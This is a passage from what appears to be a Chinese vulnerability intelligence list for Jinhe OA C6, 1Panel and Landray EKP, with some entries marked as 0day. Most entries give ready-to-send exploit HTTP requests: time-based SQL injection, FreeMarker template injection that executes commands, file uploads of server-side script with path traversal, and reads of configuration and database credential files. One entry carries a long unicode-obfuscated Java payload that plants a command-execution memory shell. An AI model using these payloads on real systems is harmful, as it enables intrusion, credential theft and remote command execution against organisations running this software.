zb2Z0LlVJLkxpYi9pbWFnZXMvaWNvbi50b29sYmFyLzE2cHgvZGV0ZXJtaW5lLnBuZwYIAAAABuehruWumgEGCQAAAAALHglfSWRlbnRpZnkCAR4LX2RhdGFTb3VyY2UFaTxyb290PjxyZWNvcmQ%2BPElEPjwvSUQ%2BPGl0ZW0gQ29sdW1uTmFtZT0n6L2m5Z6LJz48L2l0ZW0%2BPGl0ZW0gQ29sdW1uTmFtZT0n54mM54WnJz48L2l0ZW0%2BPC9yZWNvcmQ%2BPC9yb290PmRkZJju89%2Fcb0ViP%2BHqYZwpEbj%2BGmY0EecUW2zJyvdwmUng&txt_CarType=1');WAITFOR DELAY '0:0:5'--&txt_CarCode=1&bt_Search=%B2%E9%D1%AF&__VIEWSTATEGENERATOR=0A1FC31B&__EVENTTARGET=&__EVENTARGUMENT=
金和OA_HomeService.asmxSQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host:
金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
金和OA_MailTemplates.aspx_SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/C6/JHSoft.Web.Mail/MailTemplates.aspx |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1
金和OA_jc6_Upload任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
C6 |
/jc6/servlet/Upload |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/ HTTP/1.1
--ee055230808ca4602e92d0b7c4ecc63d
<% out.println("tteesstt1"); %>
--ee055230808ca4602e92d0b7c4ecc63d--
金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
C6 |
/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/ |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
金和OAC6-FileDownLoad.aspx任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
C6 |
/c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
金和OA_SAP_B1Config.aspx未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
C6 |
/C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1 |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1
金和OA_jc6_ntko-upload任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
C6 |
/jc6/ntkoUpload/ntko-upload!upload.action |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
------zqulxi4ku42pfmoelvc0
../../../../upload/xicxc2sv1n.jsp
------zqulxi4ku42pfmoelvc0
<% out.println(111*111); %>
------zqulxi4ku42pfmoelvc0
upload
------zqulxi4ku42pfmoelvc0--
金和OA_upload_json.asp存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
C6 |
/c6/KindEditor1/asp/upload_json.asp |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
-----------------------------153857212076213662067051609723
-----------------------------153857212076213662067051609723
hhh
-----------------------------153857212076213662067051609723--
金和OA_uploadfileeditorsave接口存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
C6 |
/C6/Control/UploadFileEditorSave.aspx |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1
------9fh1lo9qobtszaiahg6v
<% response.write(111*111)
%>
------9fh1lo9qobtszaiahg6v--
金和OA任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
C6 |
/C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
金和OA C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/C6/Jhsoft.Web.appraise/GeneralXmlhttpPage.aspx/?type=CheckAppraiseState&id= |
WAF封禁路路径,等待发布补丁 |
726 |
0day |
漏洞详情
/C6/Jhsoft.Web.appraise/GeneralXmlhttpPage.aspx/?type=CheckAppraiseState&id=1*
金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/C6/JHSoft.Web.WorkFlat/DBModules.aspx/ |
WAF封禁路路径,等待发布补丁 |
0826 |
0day |
漏洞详情
GET /C6/JHSoft.Web.WorkFlat/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
北京金和网络股份有限公司C6协同管理平台DBModules.aspx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/C6/JHSoft.Web.WorkFlat/DBModules.aspx/ |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
GET /C6/JHSoft.Web.WorkFlat/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
1Panel
1Panel面板最新前台RCE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
专业版 v1.10.10-lts 社区版 v1.10.10-lts 1panel/openresty:1.21.4.3-3-1-focal |
/ |
自己找 |
723 |
nday |
漏洞详情
GET / HTTP/1.1
蓝凌
蓝凌EKP存在sys_ui_component远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/sys/ui/sys_ui_component/sysUiComponent.do |
WAF封禁路径,等待发布补丁 |
723 |
nday |
漏洞详情
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
------WebKitFormBoundaryL7ILSpOdIhIIvL51
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
POST /resource/help/km/review/dataxml.jsp HTTP/1.1
s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u